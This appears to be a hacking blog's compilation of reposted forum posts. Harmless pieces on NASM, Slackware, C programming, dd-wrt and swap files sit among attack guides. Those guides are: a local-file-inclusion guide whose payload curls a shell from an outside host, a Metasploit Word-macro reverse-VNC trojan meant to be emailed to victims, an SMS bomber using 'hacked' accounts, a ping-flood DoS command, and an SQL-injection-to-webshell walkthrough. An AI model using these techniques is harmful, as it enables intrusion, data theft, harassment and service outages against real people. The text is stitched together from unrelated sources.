The Netwide Assembler grew out of an idea on comp.lang.asm.x86 (or possibly alt.lang.asm - I forget which), which was essentially that there didn't seem to be a good free x86-series assembler around, and that maybe someone ought to write one.

- a86 is good, but not free, and in particular you don't get any 32-bit capability until you pay. It's DOS only, too.
- gas is free, and ports over DOS and Unix, but it's not very good, since it's designed to be a back end to gcc, which always feeds it correct code. So its error checking is minimal. Also, its syntax is horrible, from the point of view of anyone trying to actually write anything in it. Plus you can't write 16-bit code in it (properly).
- as86 is Minix- and Linux-specific, and (my version at least) doesn't seem to have much (or any) documentation.
- MASM isn't very good, and it's (was) expensive, and it runs only under DOS.
- TASM is better, but still strives for MASM compatibility, which means millions of directives and tons of red tape. And its syntax is essentially MASM's, with the contradictions and quirks that entails (although it sorts out some of those by means of Ideal mode). It's expensive too. And it's DOS-only.

So here, for your coding pleasure, is NASM. At present it's still in prototype stage - we don't promise that it can outperform any of these assemblers. But please, please send us bug reports, fixes, helpful information, and anything else you can get your hands on (and thanks to the many people who've done this already! You all know who you are), and we'll improve it out of all recognition. Again.

Installing NASM under Unix

Once you've obtained the Unix source archive for NASM, nasm-X.XX.tar.gz (where X.XX denotes the version number of NASM contained in the archive), unpack it into a directory such as /usr/local/src. The archive, when unpacked, will create its own subdirectory nasm-X.XX.

NASM is an auto-configuring package: once you've unpacked it, cd to the directory it's been unpacked into and type ./configure. This shell script will find the best C compiler to use for building NASM and set up Makefiles accordingly.

Once NASM has auto-configured, you can type make to build the nasm and ndisasm binaries, and then make install to install them in /usr/local/bin and install the man pages nasm.1 and ndisasm.1 in /usr/local/man/man1. Alternatively, you can give options such as --prefix to the configure script (see the file INSTALL for more details), or install the programs yourself.

NASM also comes with a set of utilities for handling the RDOFF custom object-file format, which are in the rdoff subdirectory of the NASM archive. You can build these with make rdf and install them with make rdf_install, if you want them.

If NASM fails to auto-configure, you may still be able to make it compile by using the fall-back Unix makefile Makefile.unx. Copy or rename that file to Makefile and try typing make. There is also a Makefile.unx file in the rdoff subdirectory.

What's New in This Release: [ read full changelog ]

· NASM is now under the 2-clause BSD license. See section 1.1.2.
· Fix the section type for the .strtab section in the elf64 output format.
· Fix the handling of COMMON directives in the obj output format.
· New ith and srec output formats; these are variants of the bin output format which output Intel hex and Motorola S-records, respectively. See section 7.2 and section 7.3.
· rdf2ihx replaced with an enhanced rdf2bin, which can output binary, COM, Intel hex or Motorola S-records.
· The Windows installer now puts the NASM directory first in the PATH of the "NASM Shell".
· Revert the early expansion behavior of %+ to pre-2.06 behavior: %+ is only expanded late.
· Yet another Mach-O alignment fix.
· Don't delete the list file on errors. Also, include error and warning information in the list file.
· Support for 64-bit Mach-O output, see section 7.8.
· Fix assert failure on certain operations that involve strings with high-bit bytes.

refrence:http://linux.softpedia.com/get/Programming/Compilers/NASM-The-Netwide-Assembler-643.shtml

Allright, so i got this question often... Some guy got a LFI vuln some place but, what the fuck do i use it for?

Well, there is a few things you can do with it..

1. If /etc/passwd contains the user password on the system you can use ssh(assuming they got ssh and uses the users on the system as login) or if someone is a fucking idiot and make /etc/shadow readeble for anyone if /etc/passwd is just x'ed out... If on windows machine maybe you can include the SAM file? dunno..

2. You can try to include the error or access log and then telnet to the server and make it write php code to error or access log that way you can get a shell! Also if error eller access logg loggs user agent or other shit you can just browse the page with php in the useragent then include it

3. If its a shared host or a server with more pages on it you can try to find upload forms etc etc on the other pages hosted on the same server, then make a image containing php code inside it, then include it from the page you want to hack, that way getting shell access! You can ofc do this on the same domain to, if it got some kindof upload form, and it dosent need to be images, can be documents or pdf's, anything!

4. Finding config or other interesting files... Many idiots store their ftp and or ssh info in .txt or doc files outside the www dir, but if you got LFI you can include those anyway! Takes a bit time trying out file names and shit trouth xD Also .config files or config.php files can contain things like root mysqld info and that can lead to more interesting stuff! Also, maybe a page got a basic login system with reading from a config.php so you can get admin access on the page..


5. if its site and forum you can upload image with aribitary code then include and execute it..

6. You even can make it vnl to LFI
Code:

then
Code:

http://anything.org/index.php?action=../proc/self/environ?cmd=curlhttp://zero-thunder.com/mu.txt -o zero.php

and the shell will be up like this

Code:

http://anything.org/zero.php

7. or u can do something like this ..
if proc/self/environ is accessible you can
Code:

zero.php is the shell and the server will download
Code:

http://zero-thunder.com/mu.txt

and it will save it as zero.php and u will get something like this

Code:

http://anything.org/zero.php

reference:cyberterrorist

Today i will show u how to use Metasploit payload feature for Reverse VNC connection which can be hidden in a Word file and get VNC desktop of the remote user

Metasploit will create a macro for Word, which once implemented when a user opens the word file we get a reverse VNC of the target system ,where the Word file contains the macro, even antvirus cant detect It,

there is no required of VNC installed in the Victim PC
u can also do this in WAN also only thing is u should port forward ur 4444 port in ur modem or router

Lets begin

1) Create a Macro to Intergate with word

./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.147.128 V > /tmp/punter.bas

2) copy that punter.bas file in windows now go to windows
and open ur office 2003 –>tools–>macro–>visualbasic editor
then go to File–>import file–> and choose the punter.bas and save it with a name ex: macrogame.doc
now send this file to victim via mail or some other technique for this demo i will open in my system

3)now in Backtrack type this command

./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.147.128 DisableCourtesyShell=True E

When the target on the windows open the file, it will be asked if he/she wished to accept or not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the post BackTrack.
not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the post BackTrack.

Video link for the above guide

http://blip.tv/file/1847504

http://wirelesspunter.blip.tv

reference:darkc0de

SMS Bomber by AlphaDog

-Spams Cell Phones With Text Messages (SMS Bombing)

-Use

1.Select a smtp server & Port, The givin smtp svr and prt is for Gmail accounts
SMTP is the incoming and outgoing connection w/e this uses out going, smtp is used for every mailing system.

2.Type in the account information , email info / email and pass , if you don't want to use your account just select one of the ready hacked ones ..


3.Fill :
-Victims cell number
-How many to spam
-Provider

4.Type in message

5.Start Tongue

*Note that this program may harm your PC if you have CPU like Pentium 3 or older ...

so that's about it ... as you see its 1.0 so there will be updates .. i will try to imput providers providers from Macedonia and 2-3 other countries.

DOWNLOAD:
Code:

http://rapidshare.com/files/277283168/AlphaDog_SMS_Bomber.rar.html

Enjoy......................

refrence:evilzone

Q: what is dos ??
A: Denial of Service (DoS) attackes are aggressive attacks on an individual Computer or WebSite with intent to deny services to intended users.
DoS attackes can target end-user systems, servers, routers and Network links(websites)

Requirments:
1- Command Prompt (CMD or DOS) Which is usually integrated in all Windows.
2- Ip-Address of Targeted Site.

How TO GET IP OF ANY SITE??"
No problem.. here is the solution..
open ur CMD (command prompt).. and type

ping www.yoursitename.com

or

nslookup yoursite .com


It will show u ip of the site.

ohk now write this command in CMD For Attack on Any Site/ Server..


------> ping SITE-IP -l 65500 -n 10000000 -w 0.00001 <------

Here -n 10000000= the number of DoS attemps.. u can change the value "10000000" with ur desired value u want to attempt attack.

SITE-IP= Replace the text with the ip address of the site u want to be attacked..

-w 0.00001 = It is the waiting time after one ping attack.

NOTE: Dont Change or Remove -l, -n and -w in this command.. otherwise u will not able to attack!!

reference:cyberterorist forum..

URL Dumper is an Online scanner coded by me with VB.NET in the last years ago..
Used too get XSS and SQL Injections vulns.. supports multi search engine, trash system, etc..

Features:
-Get all page links by advanced technique with regular expression;
-XSS Scanner (auto check all page links);
-SQLInjection Scanner (auto check all page links);
-Multi-Thread engine;
-Get many links by search (google/Yahoo/Live Search/Altavista/Terravista)
-Search in the page source by regular expression;
-View Source (Code/Browser);
-Trash system
-Database in SQLite to organize the URL’s
-Enabled Proxy server
-Etc..

Coded by me with vb.net 2008

Screen Shot:



Download BIN:
Download SRC:
Tags: URL Dump oficial blog URL Dumper URL Dumper Source Code for free URL Dumper v.2 XSS and SQL Injection scanner;free tool

reference:http://flash.i.ph/blogs/flash/2009/01/20/url-dumper-v2/

After a long wait, Slackware fans are finally able to rejoice, as Patrick J. Volkerding announced late yesterday that Slackware 13.0 was available at last. The changes definitely warrant the major version bump, since this release has a number of unique features that its predecessor wasn't capable of, like running natively on 64-bit processors, improved X Window System that doesn't require an xorg.conf file and a massively overhauled set of build scripts.

Volkerding's enthusiasm about this release is visible in his announcement: "Yes it's that time again! After many months of development and careful testing, we are proud to announce the release of Slackware version 13.0! We are sure you'll agree that the improvements made in this release more than warrant the major version bump up from the 12.x series. We've done our best to bring the latest technology to Slackware while still maintaining the stability and security that you have come to expect."

The low-level functions are provided by the Linux kernel, version 2.6.29.6, which makes the system faster and includes support for the X Direct Rendering Interface that enables the display of hardware accelerated 3D graphics. Also, the kernel is patched to support speech synthesizers, a very useful function for the visually impaired users. A core change since Slackware 12.2 is that some devices, like network hardware, are now initialized at install time, and the new udev scripts are tweaked to give normal users a seamless experience when managing their devices.

On top of that kernel you can have by default one of the two supported desktop environments: KDE 4.2.4 or Xfce 4.6.1. GNOME fans won't feel totally stranded, as Pidgin 2.5.9, Gimp-2.6.6 and xChat 2.8.6 are included. The other applications are what you would expect from a modern operating system, with Firefox 3.5.2 on board, as well as Thunderbird 2.0.0.23. Programmers will surely enjoy the new development tools, like Perl 5.10.0, Python 2.6.2, Ruby 1.8.7-p174, Subversion 1.6.4, Git 1.6.4, Mercurial 1.2.1.

Download Slackware 13.0 right now from Softpedia.

The Cain & Abel:

http://www.softmania.pl/program-1807-cain_abel.html#m

The AirSnort:

http://www.softmania.pl/program-1806-airsnort.html#m

The Wireshark:

http://www.softmania.pl/program-1811-wireshark.html#m

The AirCrack 1.0 (Windows & Linux):

http://download.aircrack-ng.org/

The AirPcap:

http://www.softmania.pl/program-1813-airpcap_driver.html#m

The WinPcap:

http://www.softmania.pl/program-1810-winpcap.html#m

The Net Stumbler:

http://www.softmania.pl/program-1809-netstumbler.html#

m

The AirTraf:

http://www.elixar.com/corporate/history/airtraf-1.0/airtraf_download.php

The Kismet:

http://www.idg.pl/ftp/linux_740/Kismet.2005.06.R1.html

The AirJack:

http://sourceforge.net/projects/airjack/

The AiroMap:

http://handheld.softpedia.com/get/GPS/AiroMap-60181.shtml

The WiFi Hopper:

http://wifihopper.com/

The WepCrack:

http://sourceforge.net/projects/wepcrack/

The WirelessMon:

http://www.passmark.com/products/wirelessmonitor.htm

download the tools for makin better

[Introduction]
The purpose of this tutorial is to learn how to use C with some of its best features like pointers, process and thread creation, semaphores and signal handling. Of course to learn how to do all this we need to start from the beginning.
This is not a basic programming tutorial. If you don't know how the art of programming works this is not a tutorial for you. C is a very complex language if you are a beginner. Try Python or even Java if you want to start with something easy then you will be prepared to learn this awesome language.
I love Linux. Linux loves C. I don't know if any of the techniques exposed here work in a Windows machine... I really don't care if they work... Linux is a very efficient OS. I won't explain why, but in the references below, you will find the book that explains why any Unix based system is better than any flavor of Windows.

[In the beginning there was darkness]
Lets learn some syntax first:

Variable types

int: Integer
char: Character
float: Float
char* or char[]: Strings

Among others...

Assignment

int intName = 10;
char charName = 48; // "0"
char* str1Name = "Hello World";

IF-ELSE IF-ELSE statements

if(condition1){
Instructions
}else if(condition2){
Instructions
...
}else if(conditionN){
Instructions
}else{
Instructions
}

Switch statements
Faster than If statements

switch(condition){
case 1:
Instructions
break;
...
case N:
Instructions
break;
default:
Instructions
}

Loops
While loop

while(condition){
Instructions
}

For Loop

int i;
for(i=0; condition; i++){
Instructions
}

Do-While Loop

do{
Instructions
}while(condition);

Useful functions
Search in the man pages of your Linux distribution how to use them. In Debian you have to install them from the repositories.

apt-get install manpages-dev

The functions you should man for now are:
printf
scanf
strlen
strcpy
strcat
malloc
free

Pointer
The beautiful pointers... Thanks to them we have Orient Object Programming.
Let's say this is our memory (All numbers in Hex with a Little-Endian 32 bits hardware):

Endianness -> http://en.wikipedia.org/wiki/Endianness

-----------------------------
Address | Memory |
-----------------------------
0x00 | 00 | 00 | 00 | 0A |
-----------------------------
0x04 | 00 | 00 | 00 | 00 |
-----------------------------
0x08 | 4C | 4C | 45 | 48 |
-----------------------------
0x0C | 00 | 00 | 00 | 4F |
-----------------------------

Also lets say our program is:

int a = 10; //Address 0x00
int* b = &a; //Address 0x04
char* c = "HELLO"; //Address 0x08

b is a pointer. If I print b I will get 0x00000000
which is the address of a. If I print *b I will print
the value of the thing b is pointing, in this case a.
So printing *b will result in 0x0000000A or 10
If I print &a I will get the address of a which is 0x00000000

Now if I print c[2] I will get 4C which is L in the ascii table.
If I print all the string, it will print till it gets to the null byte
In this case the null byte is in the sixth byte of the string.

Now you know how to get the information of a pointer :)
To reserve memory use the function malloc like this:

char* str;
int* i;
/*
* To reserve 10 bytes for str. The (char *)
* is for the program to know what kind of
* pointer will be.
*/
str = (char *)malloc(10);
/*
* To reserve enough space for a int I use the
* sizeof function.
*/
i = (int *)malloc(sizeof(int));

Precompiler Instructions
This are special instructions. All the calculations are made by the compiler, but make us the life easier.
Include precompiler instruction
It's to import the libraries you want to use in your program.
For system libraries:

#include //This will include the stdio.h file

.


For user defined libraries:

#include "list.h"//This will include the lis.h file.

efine precompiler instruction
To define a constant:

#define TRUE 1//This will define the word TRUE as 1

The .h files are the headers files. There you'll have the firm of every function in the .c with the same name.

sum.h

#include

void printSum(int, int);

sum.c

#include "sum.h"

int sum( int a, int b ){
return ( a + b );
}

void printSum(int a, int b ){
printf("The result is %d", sum( a , b ));//Prints result on screen
}

As you can see, the the sum.h only have the printSum function. This is because printSum is a public function while sum is just a private function. If someone use this useless library will not be able to use sum, but will be able to use printSum. So to define a class you should to use a header file. But how do you define a new data type? With Structures :)

Structures
Let's say we want to define the data type Person (Name, Age, Gender)

person.h


#include
#include
#include

struct PERSON{
char* pName;
int pAge;
int pGender;//0 for man, 1 for woman
}

typedef struct PERSON Person;

Person* newPerson(char*, int, int);

person.c

#include "person.h"

//Constructor of Person. Returns NULL on error
Person* newPerson(char* name, int age, int gender){
/*
* To reserve some memory use malloc with the size you need
* In this case I need the space enough to hold a Person type
* so I use sizeof(Person);
*/
Person* nPerson = (Person *) malloc(sizeof(Person));
//To access the members of this class we should use the "->" operator.
if(gender != 0 && gender != 1){
free(nPerson);//To free the space used by nPerson
return NULL;
}
//To access the pGender, member of Person
nPerson->pGender = gender;
if(age<0){
free(nPerson);//To free the space used by nPerson
return NULL;
}
//To access the pAge, member of Person
nPerson->pAge = age;
/*
* With the function malloc I reserve as many bytes the char* name has and then
* and I assign the new address to the pName, member of Person. If the malloc
* return NULL the system call to ask some more memory failed, and the creation
* of the new type also should failed. It's efficient to free the space used for
* any reference data type if it won't be used anymore. That's why I use free(void*)
* everytime a inconsistent data or a failed system call appears.
*/
if((nPerson->pName = (char *) malloc(strlen(name)))==NULL){
free(nPerson);//To free the space used by nPerson
return NULL;
}
/*
* This function copies name to pName
* This nPerson->pName = name would only copie the
* address of name to nPerson->pName
*/
strcpy(nPerson->pName,name);
return nPerson;
}

You can also use "." intead of "->", but you need to change some things... I think is easier to work this way...

Explanation of the code:
Here I declare the members of the "class". In this case you have pName, pAge, pGender.

struct PERSON{
char* pName;
int pAge;
int pGender;
}

Here I rename the "class" from "struct PERSON" to "Person". It's just to write less code :)

typedef struct PERSON Person;

Then I declare the "constructor" of the "class"

Person* newPerson(char*, int, int);

reference:zeroidentity

• Stumble This!
• Mark as Delicious!
• Bookmark on Facebook!
• Tweet This!

Taken from thesun.co.uk

The Windows worm called Conficker could give a hacker unrestricted access to every infected machine on the planet.
And the aggressive bug could be hiding on your PC at home right now, waiting to kick in.
For the hackers, it’s like having a virtual army at their fingertips.
The criminals behind it have the power to launch a tidal wave of junk emails, bringing computers grinding to a halt.
They could also plunder information, including your bank details.
But the truth is that the best techie brains in the business just don’t know exactly what the hackers have in mind.
Infected

Virus expert Mikko Hypponen, from the firm F-Secure, said: “It is scary thinking about how much control a hacker could have over all these computers. They would have access to millions of machines.”
Microsoft, who developed the Windows computer operating system, have slapped a £175,000 bounty on whoever is responsible, so far without success.
The sophisticated Conficker bug — also known as Downadup or Kido — targets systems via the web and can be spread on memory sticks.
More than nine million computers were infected at the bug’s peak last month.
And if Conficker is still on your system come Wednesday, you could be in trouble.
Once inside your PC, it sets up files and starts downloading information from a controlling “boss” server.
Finding that website and the mastermind behind it all is like looking for a needle in a haystack.
That is because the bug creates hundreds of bogus addresses every day to put investigators off the scent.
The infected PCs then form a network and “talk” to each other, updating and evolving.
The bug even attacks anti-virus software and other files on your computer to strengthen its position.
And it resets “restore” points, making recovery of your old system even harder.



The first of three Conficker strains was discovered in November last year.
A second, more aggressive strain followed in December and a third this month. This contains the all-important April 1 trigger.


To avoid infection, Windows users must download a special free update “patch” from the Microsoft website. But that isn’t enough — you also need good anti-virus software too.
Many businesses around the world are thought also to be at risk after failing to update systems.
Graham Cluley, from computer security firm Sophos, warned: “Microsoft did a good job of updating people’s home computers.
“But the virus continues to infect businesses that have ignored the update.”
He also stressed the need for strong passwords on your computer, adding: “If users are using weak passwords — 12345, QWERTY etc — then the virus can crack them.”
F-Secure’s Mikko warned potential problems with Conficker would be highlighted wildly before April 1.
But he said he didn’t foresee an attack, despite the fears and mystery surrounding the problem.
He said: “There’s always hype — just think of previous cases.
“There is not going to be a ‘global virus attack’. We don’t know what they are planning to do, if anything.
“I think the machines that are already infected might do something new on April 1.”
Let’s hope, for everyone’s sake, that it turns out to be an April Fools’ Day hoax.

What M$ have to say about it:
Win32/Conficker.D is a variant of Win32/Conficker. Conficker.D infects the local computer, terminates services and blocks access to numerous Web sites. This variant does not spread to removable drives or shared folders across a network and is installed by previous variants of Win32/Conficker.

Other variants of Win32/Conficker infect computers across a network by exploiting a vulnerability in the Windows Server service (SVCHOST.EXE). If the vulnerability is successfully exploited, it could allow remote code execution when file sharing is enabled. It may also spread via removable drives and weak administrator passwords. It disables several important system services and security products.

Microsoft strongly recommends that users apply the update referred to in Security Bulletin MS08-067 immediately.


Microsoft also recommends that users ensure that their network passwords are strong to prevent Win32/Conficker variants from spreading via weak administrator passwords.

Ever wanted to control the access times that others can use your internet or see if your neighbors are leaching off your wifi? Tired of the shitty web interface on your router? got nothing better to do? Well dd-wrt is for you.

dd-wrt is a linux based, open source firmware for your router, adding many features such as remote access, bandwidth management, and as I mentioned the ability to kick your siblings off of limewire to free up bandwidth.

Sound awesome? It is. Before you get all excited, check and make sure your router is compatible with dd-wrt.

http://www.dd-wrt.com/dd-wrtv3/dd-wrt/hardware.html

If it is, keep reading, if its not, sucks to be you and gtfo

THIS GUIDE IS FOR THE WEB INSTALL ONLY! VISIT dd-wrt.com FOR TFTP INSTALL

Things your going to need

*about an hours worth of time or less, depending on your IQ
*compatible router
*linux, windows xp or vista
*network cable

First off, download dd-wrt.
http://www.dd-wrt.com/dd-wrtv3/dd-wrt/downloads.html
choose who v24 sp 1, then click consumer, and find who makes your router. THEN click on its model number. from there, download the file

dd-wrt.v24_mini_generic.bin

and keep it on your desktop.

Now its time to get your hands dirty with installing.

***************WARNING READ THIS******************
Incorrectly flashing will brick (break) your router! If your a 12 year old regular scriptkiddie on here, DONT DO THIS UNLESS YOU CAN REPLACE YOUR ROUTER.

You have been warned, dont bitch at me if you mess up.


Fist off, open firefox (yes firefox, if your using internet explorer you need to switch now) and go to http://192.168.1.1/. WHATS THIS A WEB PAGE? No, this is your router on your local network. If you get a blank page, your router may have a different IP address than the normal which I just posted.

TO FIND OUT YOUR ROUTER IP, (on windows)
Click start > run and type in cmd
in the command prompt, type ipconfig
you should see the following:


AND THIS BLOCK OF TEXT IS TAKEN FROM DD-WRT.COM
If you know the IP address, username, and password of your router:

1. Follow the instructions in the next section to log in to the Web GUI.
2. Click the "Administration" tab.
3. Click the "Factory Defaults" sub-tab.
4. Select "Yes".
5. Click the "Save Settings" button.
6. A new page will open, click "continue".

If you do not know the IP address, username, or password of your router, read above or LEARN TO READ I CANT SPOON FEED YOU ANY MORE.

and now back to my guide.


This will clear all settings on your router... setting the stage for dd-wrt.

Now its time to do a 30/30/30 reset. While the router is plugged in, hold the reset button for 30 seconds. while still holding the reset button, unplug the unit for 30 second and plug it back in, whilest still holding the reset button, for another 30 seconds while the unit is running.

in other words, HOLD THE BUTTON FOR 1 minute 30 seconds while unplugging the router and plugging it back in.

The stage is now set to upload the dd-wrt firmware.


*******************FINAL BLUNT WARNING*****************
FUCKING UP WILL BREAK YOUR ROUTER IF YOU HAVE A LOW IQ DO NOT CONTINUE
****************************************************

following text taken from dd-wrt.com
1. First do a hard reset on the unit that DD-WRT is to be loaded onto. 2. You should be in the Web GUI of the router. Go there now. (192.168.1.1 in your web browser)
3. Click the "Administration" tab
4. Click the "Firmware Upgrade" sub-tab.
5.
6. Click the "Browse" button and select the DD-WRT .bin file you downloaded and confirmed. (file is dd-wrt.v24_mini_generic.bin on your desktop)
7. Click the "Upgrade" button.
8. The router will take a few minutes to upload the file and flash the firmware. During this time, the power light will flash.
9. A new page will open confirming that the upload was successful (Installation#Possible errors if not). Now wait about 5 minutes before clicking "Continue".
10. Lastly, do another hard reset on the unit. (same thing as above, 30/30/30 reset)
11. If flashed successfully you will now be able to access the DD-WRT web interface at 192.168.1.1

END OF COPIED TEXT

12. If you cant access the web interface at 192.168.1.1, your pretty bone now arent you? (in other words, your router is probly bricked Roflmao)

Go ahead and play with your new firmware. Turn up the power on your antennas to 52 mw (NOT PAST 52 UNLESS YOU WANT A FIRE AND OR BURNT HARDWARE)

More copied text from dd-wrt.com, if you had an "upload failed" error. I allready told you to use the generic version of the firmware anywho, so your probably just thick.

Possible Errors

During the firmware upload process, if your router says something similar to, "Upload Failed," you may be using the wrong version of DD-WRT. This may occur through the web GUI if you use a *wrt54g.bin version when you should have selected the generic version instead. It may also be that your router requires the mini version to be flashed before the full version. Be sure to double check to make sure you have the right version. If you are certain that your router is supported and that you have the correct firmware, you may simply need to use a different web browser (e.g. from Firefox to Internet Explorer).

END OF COPIED TEXT

and thats it for my guide. You can explore dd-wrt and play with its features yourself. If you have any problems during install, LOOK AT THEIR GODDAMNED GUIDE at http://www.dd-wrt.com/wiki/index.php/Installation

This is a watered down, spoon fed version of it. I cant make it any easier than it is allready. Blunt, simple, and to the point.

rep me if you think its a decent guide.

questions or comments? Post here, dont even think about pm'ing me with trivial questions covered on dd-wrt.com or in my guide.

good luck and dont brick your router!

reference: das pacman@hackforums

• Stumble This!
• Mark as Delicious!
• Bookmark on Facebook!
• Tweet This!

MySQL Database is a great product used by thousand of websites. Various web applications use MySQL as their default database. Some of these applications are written with security in mind, and some are not. In this article, I would like to show you how you can exploit SQL injection in order to gain almost full control over your webserver.

Most people know that SQL injection allows attackers to retrieve database records, pass login screens, change database content, through the creation of new administrative users. MySQL does not have a built-in command to execute shell commands, like Microsoft SQL server. I will show you how to run arbitrary commands using standard features provided by MySQL.

First of all, I would like to give a brief description of SQL injection, then I would like to present you with a couple less known methods that exist in MySQL, which I will use to backdoor a webserver. I will use 2 built-in MySQL commands - one that writes arbitrary files and the one that can be used to read arbitrary files. After that I will describe webshells and go to the attack itself.
What is SQL Injection?

SQL injection is an attack that allows the attacker to add logical expressions and additional commands to the existing SQL query. This attack can succeed whenever a user has submitted data that is not properly validated and is glued together with a legitimate SQL query.

For example, the following SQL command is used to validate user login requests:

$sql_query = "select * from users where user='$user' and password='$pass'"

If the user-submitted data is not properly validated, an attacker can exploit this query and pass the login screen by simply submitting specially crafter variables. For example, attacker can submit the following data as a $user variable: admin' or '1'='1 . When this $user variable is glued together with the query, it will look as followed:

$sql_query = "select * from users where user='admin' or '1'='1' and password='$pass'"

Now, the attacker can safely pass the login screen because or '1'='1' causes the query to always return a "true" value while ignoring the password value.

Using similar techniques, an attacker can retrieve database records, pass login screens, and change database contents, for example by creating new administrative users. In this document, I will show how by applying similar techniques, we will be able to execute arbitrary shell commands.
Command 1- Writing arbitrary files

MySQL has a built-in command that can be used to create and write system files. This command has the following format:

mysq> select "text" INTO OUTFILE "file.txt"

One big drawback of this command is that it can be appended to an existing query using UNION SQL token.

For example, it can be appended to the following query:
select user, password from user where user="admin" and password='123'

Resulting query:
select user, password from user where user="admin" and password='123' union
select "text",2 into outfile "/tmp/file.txt" -- '

As a result of the above command, the /tmp/file.txt file will be created including the query result.
Command 2- Reading arbitrary files

MySQL has a built-in command that can be used to read arbitrary files. The syntax is very simple. We will use this command for plan B.

mysql> select load_file("PATH_TO_FILE");
Webshell

Webshell is a polpular and widely used tool for executing shell commands from within the web browser. Some call these tools PHP shells. We will create a very simple webshell that will execute shell commands.

Here is the code of a very basic PHP shell (parameter passed by cmd will be executed):

For example, in the following screenshot, id command is executed.



Attack Scenario

1. Find SQL injection

It is out of the scope of this document. You must first find SQL injection.

2. Find a directory with write permission

To create a webshell PHP script, we need a directory with write permission on. Temporary directories used by popular Content Management Systems are a good choice for this. Check the following urls to find one:

* hxxp://www.target.com/templates_compiled/
* hxxp://www.target.com/templates_c/
* hxxp://www.target.com/templates/
* hxxp://www.target.com/temporary/
* hxxp://www.target.com/images/
* hxxp://www.target.com/cache/
* hxxp://www.target.com/temp/
* hxxp://www.target.com/files/

In our example we will use a temp directory.

3. Exploit SQL injection - create web shell

You need to append the following string to the legitimate SQL command:

UNION SELECT "",2,3,4 INTO OUTFILE "/var/www/html/temp/c.php" --
Some explanation:

* 2,3,4 are just a qualifier that used to make the same number of columns as in the first part of the select query.
* /var/www/html is a default web directory in the RedHat-like distributions (Fedora, CentOS).
* temp is a directory with full write access. In your case it could be a different directory.

The above command will write the query's result with the "" string appended. Because we added a php extension to the file name, this string will be treated as a PHP command and will allow us to execute shell commands!

4. Execute shell commands

Now it is the easiest part. Simply open the webserver to execute shell commands. In our example it will be:

* hxxp://www.target.com/temp/c.php?cmd=SHELL_COMMAND

For example:

* hxxp://www.target.com/temp/c.php?cmd=id

Plan B

In case you failed to create a PHP file due to a wrong path, there are a number of workarounds:

1. Generate PHP errors.

You need to create a situation when a PHP script will fail and the full disk path will be printed in the error message. You can play with page parameters to make this happen.

2. Find the file that will print phpinfo().

In some cases you will be lucky and you will get a phpinfo() function executed. This function prints a wealth of PHP internal information including the current directory location.

Try to access the following urls:

* hxxp://www.target.com/phpinfo.php
* hxxp://www.target.com/test.php
* hxxp://www.target.com/info.php

3. Look for a default web directory location.

You need to get a default web directory location for a web server. Check the following page since it has a big list of default Apache configurations that are used in different distributions.
http://wiki.apache.org/httpd/DistrosDefaultLayout

4. Read the Apache configuration files.

MySQL has a built-in command that allows the attacker to read arbitrary files. We can exploit this command to read Apache configuration files and study directory structures. Simply use the load_file() MySQL function.

For example (SQL query after injection):
select user, password from user where user="admin123" and password='123' UNION select load_file("/etc/apache2/apache2.conf"), 2 -- '

Note:
You can find a location of Apache configurations at this resource:
http://wiki.apache.org/httpd/DistrosDefaultLayout
Limitation

In order to allow the above to work, the MySQL user used by this application must have a FILE permission. For example by default, a "root" user has this permission on. FILE is an administrative privilege that can only be granted globally (using ON *.* syntax).

For example, if the MySQL user was created using the following command, the user will have this FILE permission on.
GRANT ALL PERMISSIONS to *.* to 'USER_NAME'@'HOST_NAME' IDENTIFIED BY 'PASSWORD'
Countermeasures

1. Install the GreenSQL database firewall.

GreenSQL is an open source database firewall that can automatically block the commands described above: load_file and INTO OUTFILE. By default, GreenSQL blocks administrative and sensitive SQL commands. In addition, GreenSQL prevents SQL injections by calculating the risk of each query and blocking queries with high risk. For example , UNION token and SQL comments are taken into account. Check the application website for more information http://www.greensql.net/

2. Do not use MySQL root user to access the database.

Do not use administrative users to access the database. It is recommended to create a distinct user with hardened permissions to access specific databases.

3. Revoke FILE permission from the MySQL user used in your applications.

mysql> REVOKE FILE ON *.* from 'USER_NAME'@'HOST_NAME';

4. Application code review.

Ensure that your application does not have any SQL injections and that the code is updated.
Links

1. MySQL Injection Cheat Sheet
http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

2. SQL Injection Cheat Sheet
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

3. MySQL Documentation
http://dev.mysql.com/doc/

In this tutorial I'm going to tell you what the Swap file is and how to configure, for best performance.

The swap file (virtual memory) is disk memory that the Windows operating system uses to help manage applications when they exceed the amount of RAM configured in the computer. It's important that the swap file be allocated an amount of disk space appropriate for the amount of RAM in the computer. Opinions vary on how big the swap file should be, but most state it should be at least two or three times the size of the amount of RAM. This means if you have 512MB of RAM in the computer, the swap file should be configured to something like 1536MB of RAM. It doesn't need to be exact. The steps below show how I've allocated the swap file for My Super PC (NOT, actually the oldest computer in the world). As you can see, I've allocated about 3 times the 1024MB of RAM I have in My Super PC. If you have ample hard drive space then it's a good idea to go ahead and allocate this much space even if you have 512MB of RAM or less. That way it won't be necessary to remember to increase it should more RAM be added to the computer later.


To change the size of the swap file on Windows XP, click on the Start button and then right click on "My Computer" to bring up a small pop-up menu. On this menu, click on "Properties" to bring up the System Properties window.


The System Properties window looks like this. Click on the "Advanced" tab.



In the Performance sub-window, click on the "Settings" button.



The Performance Options window appears. Click on the "Advanced" tab.



In the Virtual memory sub-window, click on the "Change" button.



Here are the default values set by Windows XP for the amount of RAM I have in my computer.
Notice in the little window that the C: drive is highlighted showing that is the drive with the swap file, and that the size range of the swap file is also shown.



The "Custom size" option is already selected. Setting the "Initial size" and "Maximum size" to the same values increases efficiency and performance since Windows does not have to manage re-sizing the swap file.
Notice that the "Set" button - not the "Ok" button - needs to be clicked for the changes to actually be accepted.



Notice that the highlighted entry has changed to show the new configuration. Click on the "Ok" button.



Clicking on the "Ok" button again...



… and then again takes us back to the desktop.



Restart the computer for the changes to go into effect.


reference:hackforums